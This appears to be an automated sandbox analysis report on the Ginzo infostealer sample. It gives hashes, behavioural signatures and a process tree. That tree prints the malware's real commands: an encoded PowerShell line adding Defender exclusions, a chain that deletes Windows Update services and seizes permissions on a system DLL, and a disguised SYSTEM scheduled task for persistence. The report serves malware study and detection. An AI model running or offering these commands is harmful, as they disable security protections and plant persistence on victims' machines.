Analysis
- max time kernel: 45s
- max time network: 56s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 20-05-2022 23:04
Static task: static1
Behavioral task: behavioral1
Sample: Ginzo.exe
Resource: win7-20220414-en
General
-
Target
Ginzo.exe
-
Size
184KB
-
MD5
9d754925aa0e92fcc36d052bafa0cc1d
-
SHA1
5f2afa65a5a43cf21b5b6fa2933ca909989679ad
-
SHA256
9d5c5ef922aa7343c1ec29d5a6eb1b006f4b3aee817211ea958b6810df28510b
-
SHA512
8775eda9a19379b6875b8eef50c7da17abda07ee1caa7fe45e83ed23a5c2b7f749e04f514b298a85e2ff73df3c4ca35263b69756f14790e65d72cf34e3067582
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
-
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
pid | process
4404 | 722038.exe
1396 | updater.exe
-
Possible privilege escalation attempt 2 IoCs
Processes:
pid | process
5000 | takeown.exe
4272 | icacls.exe
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | Ginzo.exe
-
Loads dropped DLL 7 IoCs
Processes:
pid | process
4864 | Ginzo.exe
4864 | Ginzo.exe
4864 | Ginzo.exe
4864 | Ginzo.exe
4864 | Ginzo.exe
4864 | Ginzo.exe
4864 | Ginzo.exe
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
pid | process
5000 | takeown.exe
4272 | icacls.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
16 | freegeoip.app
17 | freegeoip.app
-
Drops file in Program Files directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Chrome\updater.exe | conhost.exe
File opened for modification | C:\Program Files\Chrome\updater.exe | conhost.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | Ginzo.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Ginzo.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
pid | process
3336 | reg.exe
3816 | reg.exe
5016 | reg.exe
432 | reg.exe
2412 | reg.exe
3308 | reg.exe
1156 | reg.exe
4140 | reg.exe
4056 | reg.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pid | process
3280 | powershell.exe
3280 | powershell.exe
3148 | conhost.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4864 | Ginzo.exe
Token: SeDebugPrivilege | 3280 | powershell.exe
Token: SeDebugPrivilege | 3148 | conhost.exe
Token: SeTakeOwnershipPrivilege | 5000 | takeown.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ginzo.exe
"C:\Users\Admin\AppData\Local\Temp\Ginzo.exe" 1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\722038.exe
"C:\Users\Admin\AppData\Local\722038.exe" 2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\722038.exe" 3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A" 4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A" 5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE 4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe
sc stop UsoSvc 5⤵
-
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc 5⤵
-
C:\Windows\system32\sc.exe
sc stop wuauserv 5⤵
-
C:\Windows\system32\sc.exe
sc stop dosvc 5⤵
-
C:\Windows\system32\sc.exe
sc stop bits 5⤵
-
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f 5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f 5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f 5⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f 5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f 5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll 5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q 5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f 5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f 5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f 5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f 5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE 5⤵
-
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE 5⤵
-
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE 5⤵
-
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE 5⤵
-
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE 5⤵
-
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE 5⤵
-
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE 5⤵
-
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"' 4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"' 5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC" 4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC" 5⤵
-
C:\Program Files\Chrome\updater.exe
"C:\Program Files\Chrome\updater.exe" 1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Chrome\updater.exe
Filesize: 4.1MB
MD5: c1fd183c8ef30db8e2be4ab51e42501f
SHA1: 67a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256: 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA512: 8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Users\Admin\AppData\Local\722038.exe
Filesize: 4.1MB
MD5: c1fd183c8ef30db8e2be4ab51e42501f
SHA1: 67a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256: 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA512: 8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize: 461KB
MD5: a999d7f3807564cc816c16f862a60bbe
SHA1: 1ee724daaf70c6b0083bf589674b6f6d8427544f
SHA256: 8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA512: 6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize: 685KB
MD5: 081d9558bbb7adce142da153b2d5577a
SHA1: 7d0ad03fbda1c24f883116b940717e596073ae96
SHA256: b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA512: 2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize: 384KB
MD5: 55c797383dbbbfe93c0fe3215b99b8ec
SHA1: 1b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA256: 5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512: 648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll
Filesize: 1.3MB
MD5: 8be215abf1f36aa3d23555a671e7e3be
SHA1: 547d59580b7843f90aaca238012a8a0c886330e6
SHA256: 83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae
SHA512: 38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b